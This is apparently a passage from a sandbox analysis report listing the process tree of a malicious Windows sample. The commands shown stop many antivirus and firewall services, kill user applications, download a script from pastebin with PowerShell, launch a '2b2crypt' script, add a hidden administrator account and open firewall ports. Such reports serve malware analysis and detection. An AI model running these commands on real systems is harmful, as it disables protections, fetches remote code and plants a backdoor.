C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y4⤵PID:1584
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop helpsvc /y4⤵PID:1584
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1016
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend NT Realtime Service" /y4⤵PID:848
-
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:848
-
-
-
C:\Windows\system32\tskill.exetskill iexplore2⤵PID:692
-
-
C:\Windows\system32\net.exenet stop netsvcs2⤵PID:660
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus RPC Server" /y2⤵PID:1400
-
-
C:\Windows\system32\tskill.exetskill excel2⤵PID:1356
-
-
C:\Windows\system32\tskill.exetskill iTunes2⤵PID:1916
-
-
C:\Windows\system32\tskill.exetskill msnmsgr2⤵PID:1092
-
-
C:\Windows\system32\tskill.exetskill calc2⤵PID:780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus" /y3⤵PID:784
-
-
-
C:\Windows\system32\tskill.exetskill msaccess2⤵PID:1280
-
-
C:\Windows\system32\tskill.exetskill safari2⤵PID:1704
-
-
C:\Windows\system32\tskill.exetskill mspaint2⤵PID:1672
-
-
C:\Windows\system32\tskill.exetskill outlook2⤵PID:1592
-
-
C:\Windows\system32\tskill.exetskill msnmsgr2⤵PID:1660
-
-
C:\Windows\system32\tskill.exetskill firefox2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1344
-
-
C:\Windows\system32\tskill.exetskill LimreWire2⤵PID:584
-
-
C:\Windows\system32\tskill.exetskill WINWORD2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2020
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:852
-
-
C:\Windows\system32\net.exenet stop "Trend NT Realtime Service" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1332
-
-
C:\Windows\system32\net.exenet stop "Trend Micro Proxy Service" /y2⤵PID:948
-
-
C:\Windows\system32\net.exenet stop "PC-cillin Personal Firewall" /y2⤵PID:832
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵PID:2008
-
-
C:\Windows\system32\net.exenet stop InoTask /y2⤵PID:1676
-
-
C:\Windows\system32\net.exenet stop InoRPC /y2⤵PID:712
-
-
C:\Windows\system32\net.exenet stop "DefWatch" /y2⤵PID:364
-
-
C:\Windows\system32\net.exenet stop "Nav Auto-Protect" /y2⤵PID:948
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:1712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵PID:1052
-
-
-
C:\Windows\system32\net.exenet stop ccPwdSvc /y2⤵PID:1500
-
-
C:\Windows\system32\net.exenet stop "*McAfee*" /y2⤵PID:336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMGR /y3⤵PID:1044
-
-
-
C:\Windows\system32\net.exenet stop "*Symantec*" /y2⤵PID:584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://pastebin.com/raw/2K5m42Xp -outfile ycynlog.cmd"2⤵PID:852
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd2⤵PID:712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.cmd2⤵
- Suspicious behavior: EnumeratesProcesses
PID:692
-
-
C:\Windows\system32\net.exenet stop helpsvc /y2⤵PID:1680
-
-
C:\Windows\system32\net.exenet stop mcupdmgr.exe /y2⤵PID:108
-
-
C:\Windows\system32\net.exenet stop MskService /y2⤵PID:856
-
-
C:\Windows\system32\net.exenet stop "norton Unerase Protection" /y2⤵PID:1356
-
-
C:\Windows\system32\net.exenet stop "Symantec Network Drivers Service" /y2⤵PID:1520
-
-
C:\Windows\system32\net.exenet stop ccEvtMGR /y2⤵PID:336
-
-
C:\Windows\system32\net.exenet stop NProtectService /y2⤵PID:432
-
-
C:\Windows\system32\net.exenet stop SAVScan /y2⤵PID:1552
-
-
C:\Windows\system32\net.exenet stop MonSvcNT /y2⤵PID:1548
-
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵PID:1712
-
-
C:\Windows\system32\net.exenet stop "Ahnlab Task Scheduler" /y2⤵PID:1236
-
-
C:\Windows\system32\net.exenet stop "McAfee SecurityCenter Update Manager" /y2⤵PID:1560
-
-
C:\Windows\system32\net.exenet stop "McAfee Personal Firewall Service" /y2⤵PID:1132
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:660
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto-Protect Service" /y2⤵PID:904
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Firewall Monitor Service" /y2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1704
-
-
C:\Windows\system32\net.exenet stop "Automatic Updates" /y2⤵PID:572
-
-
C:\Windows\system32\net.exenet stop "Security Center" /y2⤵PID:1488
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:2008
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵PID:596
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:1912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:960
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:596
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2108
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2272
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2452
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2604
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2740
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2960
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:1676
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2244
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2232
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2516
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2852
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:3056
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2320
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2536
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2720
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2860
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2952
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1880
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2188
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2768
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2776
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2924
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2992
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2116
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1880
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2272
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2496
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2568
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2760
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:960
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2972
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2132
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1676
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2720
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:1924
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2672
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵PID:1992
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1356 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:1280
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:1488
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:296
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2232
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2376
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2488
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2636
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2780
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2968
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵
- Suspicious behavior: EnumeratesProcesses
PID:780
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2328
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2648
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2832
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2780
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:3000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2308
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2428
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2680
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2828
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2780
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2104
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1560
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2456
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2660
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2872
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2960
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1584
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2268
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2796
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2956
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2180
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2224
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2252
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2788
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2844
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:3012
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2240
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2256
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2284
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2320
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2584
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2652
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2064
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2056
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:3036
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2184
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2388
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2256
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2140
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2276
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2044
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2724
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2268
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2748
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2864
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:308
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2848
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2960
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2260
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2316
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2820
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2836
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2892
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:3064
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2796
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:1168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2972
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2164
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:548
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2680
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2052
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2300
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:3008
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:396
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2472
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2556
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2268
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2568
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2832
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2432
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2056
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:1056
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:296
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2972
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2188
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1924
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2664
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2120
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2796
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:844
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:3056
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2496
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2132
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2620
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2760
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2936
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2652
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2124
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2624
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:296
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2960
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2312
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1352
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2476
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2824
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:1112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵PID:616
-
-
